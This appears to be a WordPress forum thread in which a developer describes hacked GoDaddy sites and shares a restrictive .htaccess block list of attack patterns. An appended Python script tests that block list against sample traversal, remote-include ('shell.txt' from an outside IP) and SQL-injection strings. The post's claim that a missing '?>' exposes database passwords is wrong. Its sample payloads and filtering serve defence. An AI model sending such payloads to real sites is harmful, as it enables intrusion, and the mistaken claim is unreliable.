hackerssuck
Forum Replies Created
Forum: Fixing WordPress
In reply to: Exploits and GoDaddy
Instead of posting my final GoDaddy security vulnerabilities info here, I'll post it on my site, since this is primarily a GoDaddy security issue, not a WordPress security issue. Thanks sambell for pointing out the correct wp-config.php info. I wasn't 100% sure about that closing tag statement I made, and I should have double checked before posting that info.
Forum: Fixing WordPress
In reply to: Exploits and GoDaddy
I agree with you 100%, sambell. It has nothing to do with WordPress at all, really. WordPress is very, very, very secure, and I have rarely had to "fix" a hacked WordPress site on other hosts, unless the client has made the mistake and opened the door(s) themselves. I was totally kidding, of course, about asking you if you were a hacker; that was a joke, and I didn't make it absolutely clear that I was just joking with you. I am finding all sorts of other security vulnerabilities with default GoDaddy files, and obviously hackers know this and are hovering like vultures waiting for their next meal. I also wanted to point out that I used the GoDaddy application installer to install WordPress; I did not do a clean install of WP. Yeah, I know I am asking for it by using their prebundled WordPress package.
Forum: Fixing WordPress
In reply to: Exploits and GoDaddy
The other thing I wanted to mention is that the client also had an HTML site with a body onload that was not filtered, and that site was also XSS hacked.
Forum: Fixing WordPress
In reply to: Exploits and GoDaddy
Hmm, OK, maybe I'm not exactly correct in stating that the closing tag is absolutely necessary, but I have always seen it in all other hosts' wp-config.php files. You wouldn't be a hacker by any chance, would you? What I do know for sure is that I installed WordPress on GoDaddy and within hours it was hacked. I installed WordPress on another totally new GoDaddy account and within hours it was hacked. What I also know for sure is that my .htaccess file is a smack down for these amateurs. DENIED DENIED DENIED DENIED.
Forum: Fixing WordPress
In reply to: Exploits and GoDaddy
CORRECTION:
Only newly installed plugins are affected: you will not be able to install and activate them. You can deactivate and reactivate all of your existing installed plugins.
Forum: Fixing WordPress
In reply to: Exploits and GoDaddy
I am a professional WordPress developer. I have a client that was being hacked almost immediately after installing WordPress on GoDaddy. The WordPress installation, right from the get go, has a huge problem. The wp-config.php file in the GoDaddy WordPress installation package is exposed because it does not have the closing tag ?> at the end. This means that your SQL DB username and password can be grabbed. I am finding several other security vulnerabilities and am still in the process of isolating all of them.

I have been successful at completely blocking the hackers by adding the .htaccess file below until I am completely done plugging all the holes. I would advise anyone who has WordPress installed on GoDaddy to add this .htaccess code to their website immediately. I notified GoDaddy yesterday, 2-13-2010, but I am not going to wait around for them to act and take care of this.

Some of the hacks that occurred to this client: XSS hidden iframe injection, XSS injected code throughout the site affecting all critical .js files, backdoors set up everywhere, and the /stats folder on GoDaddy has a huge security vulnerability (the primary host account password can be grabbed). There are several other security vulnerabilities that I am finding, and I will add a full detailed report once I have that info.

For now, like I said, I am successfully blocking the hackers with this very restrictive .htaccess file. It will actually block you from activating plugins in your admin panel. This is a temporary inconvenience, of course, but for now it is absolutely necessary for ABSOLUTE LOCKDOWN of your website. Everything else is fine, i.e. your website is functional and viewable by the world and can be indexed by search engines without any problems. Until I am 100% sure that I have discovered every single security vulnerability, I am not giving these pricks a shot. And they have been trying now for 2 days.

Since they are no longer able to clean their tracks from the logs, I am watching the logs fill up with failed attempt after failed attempt at hacking this site.

I recommend you first create a maintenance mode PHP script and .htaccess file for your website, so that if my very restrictive .htaccess file does not allow your site to fully function properly, you can just have your site display that it is being worked on and under maintenance (503 status code) until you can fix everything. This is a 503 error status that you will not be penalized for by search engines. Once again, I will post a full description of all GoDaddy security vulnerabilities and fixes here later, once I have completed all of my investigations.
Create a PHP file called maintenanceXXXXX.php (replace the XXXXX's with something unique) from this code:

<?php
// Send a 503 so search engines treat the outage as temporary, and tell
// them via Retry-After (in seconds) when to come back: 172800 = 48 hours.
header('HTTP/1.1 503 Service Temporarily Unavailable', true, 503);
header('Status: 503 Service Temporarily Unavailable');
header('Retry-After: 172800');
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "https://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<meta name="robots" content="noindex,nofollow">
<title>503 - Temporarily Closed For Maintenance</title>
<style type="text/css">
<!--
p { font-family: "Verdana", sans-serif; }
-->
</style>
</head>
<body>
<!-- Replace the site name below with your own -->
<p><b>Natural Herbal Remedies</b></p>
<p>is temporarily closed for maintenance.</p>
<p>Normal operation will resume as soon as possible.</p>
</body>
</html>
The maintenance mode 503 .htaccess file code (the filename in the last two rules must match the maintenanceXXXXX.php file you created above):

RewriteEngine On
RewriteBase /

# Testing aid: uncomment the next line and set it to your own IP address
# to close the site only to YOURSELF and confirm the page works, then
# comment it out again to close the site to everyone.
#RewriteCond %{REMOTE_ADDR} ^000\.000\.000\.000$

# The remaining lines close the site. They say: if the request is NOT for
# the maintenance page, serve the maintenance page instead. You MUST allow
# at least one file (the maintenance page itself) to be served without
# rewriting it, or the rule loops forever. To allow another file, copy the
# line below and change the filename.
RewriteCond %{REQUEST_URI} !^/maintenanceXXXXX\.php$

# No matter what file was requested, serve the maintenance page. This is a
# rewrite (not a redirect), so use the local file path, no https://.
RewriteRule ^(.*)$ /maintenanceXXXXX.php [L]
OK, now for the very restrictive .htaccess file:

# GoDaddy-specific: selects the PHP 5 interpreter for this account
setenv PHPVERSION 5

### Turning on the RewriteEngine ###
RewriteEngine on
RewriteBase /
ServerSignature Off

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress

# FILTER REQUEST METHODS: answer TRACE, DELETE and TRACK with a 403
<IfModule mod_rewrite.c>
RewriteCond %{REQUEST_METHOD} ^(TRACE|DELETE|TRACK) [NC]
RewriteRule ^(.*)$ - [F,L]
</IfModule>

# QUERY STRING EXPLOITS: any request whose raw query string matches one of
# these patterns gets a 403 ([NC] = case-insensitive, [OR] = any single
# condition is enough)
<IfModule mod_rewrite.c>
RewriteCond %{QUERY_STRING} \.\.\/ [NC,OR]
RewriteCond %{QUERY_STRING} boot\.ini [NC,OR]
RewriteCond %{QUERY_STRING} tag\= [NC,OR]
RewriteCond %{QUERY_STRING} ftp\: [NC,OR]
RewriteCond %{QUERY_STRING} http\: [NC,OR]
RewriteCond %{QUERY_STRING} https\: [NC,OR]
RewriteCond %{QUERY_STRING} mosConfig [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(\[|\]|\(|\)|<|>|'|"|;|\?|\*).* [NC,OR]
# pipe and curly braces (an empty alternative here would match every request)
RewriteCond %{QUERY_STRING} ^.*("|'|<|>|\||\{|\}).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(%0|%A|%B|%C|%D|%E|%F|127\.0).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(globals|encode|localhost|loopback).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(request|select|insert|union|declare|drop).* [NC]
RewriteRule ^(.*)$ - [F,L]
</IfModule>
This .htaccess file is so restrictive that it will also block you, as an admin, from activating plugins, but I have been monitoring a hacker for days trying every possible XSS attack string, and I see nothing but denied, not allowed, etc. messages in the website error log.
Once again, I will post a more detailed GoDaddy WordPress security report once I have completed all of my findings. I am currently looking at the webformmailer.php file that is installed on all GoDaddy accounts by default; it appears that it is being exploited. You may want to temporarily disable it. gdform.php so far appears to be OK. I recommend that you immediately check your MySQL on your GoDaddy account and look for any databases that you did not create. Clear all of the tables immediately. The DB I found was called __piggy. More complete info on this will be posted tomorrow or Tuesday at the latest. Slam the doors on these dirtbags. Good luck to all.
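An added example, not part of the post above and not code from its author: the twelve QUERY STRING EXPLOITS conditions from the restrictive .htaccess ported one-to-one to Python and run over constructed query strings (attack-style and legitimate WordPress ones), so you can see which requests the filter would answer with a 403 before deploying it. Apache matches the raw, still percent-encoded query string with [NC], so the port uses re.IGNORECASE and never URL-decodes. The ninth condition is assumed to mean "pipe and curly braces" (the page's copy of that line is garbled); the sample query strings and their labels are made up for the demonstration.

```python
import re

# The twelve RewriteCond patterns, in the order the .htaccess lists them.
# Apache evaluates the [OR] chain top-down, so the first hit is what fires.
QUERY_STRING_RULES = [
    ("directory traversal", r"\.\./"),
    ("boot.ini probe", r"boot\.ini"),
    ("tag= parameter", r"tag="),
    ("ftp: URL", r"ftp:"),
    ("http: URL", r"http:"),
    ("https: URL", r"https:"),
    ("Joomla mosConfig", r"mosConfig"),
    ("bracket/quote/meta chars", r"[\[\]()<>'\";?*]"),
    # assumption: the garbled '\|{||' on the page meant pipe and braces
    ("quote/pipe/brace chars", r"[\"'<>|{}]"),
    ("encoded bytes / loopback IP", r"%0|%A|%B|%C|%D|%E|%F|127\.0"),
    ("PHP/host keywords", r"globals|encode|localhost|loopback"),
    ("SQL keywords", r"request|select|insert|union|declare|drop"),
]

# [NC] flag == case-insensitive; RewriteCond is an unanchored search
COMPILED_RULES = [(name, re.compile(pat, re.IGNORECASE))
                  for name, pat in QUERY_STRING_RULES]


def first_matching_rule(query_string):
    """Return the name of the first rule a raw query string trips, or None
    if the request would pass through to WordPress untouched."""
    for name, regex in COMPILED_RULES:
        if regex.search(query_string):
            return name
    return None


def classify(requests):
    """Map each (label, raw query string) pair to the rule that would 403 it."""
    return {label: first_matching_rule(qs) for label, qs in requests}


# Constructed sample requests (not taken from any real log).
SAMPLE_REQUESTS = [
    # attacker-style query strings the filter is meant to stop
    ("lfi traversal", "page=../../../../etc/passwd"),
    ("remote file include", "cmd=http://198.51.100.7/shell.txt"),
    ("sql injection", "id=1 UNION SELECT user,pass FROM wp_users"),
    ("encoded script tag", "s=%3Cscript%3Ealert(1)%3C/script%3E"),
    # legitimate WordPress traffic that the same rules also refuse
    ("tag archive (default permalinks)", "tag=security"),
    ("wp-login redirect_to", "redirect_to=http://example.com/wp-admin/"),
    ("search containing a SQL word", "s=select+the+best+plugins"),
    ("non-ASCII search term (UTF-8)", "s=caf%C3%A9"),
    # traffic that passes
    ("plain post id", "p=42"),
    ("no query string at all", ""),
]


if __name__ == "__main__":
    for label, verdict in classify(SAMPLE_REQUESTS).items():
        status = "403 (%s)" % verdict if verdict else "200 passed through"
        print("%-36s -> %s" % (label, status))
```

The empty query string passing is the check that matters most: with the garbled ninth condition taken literally (an empty alternative inside the group), every request on the site would match and be refused, which is not what the post describes.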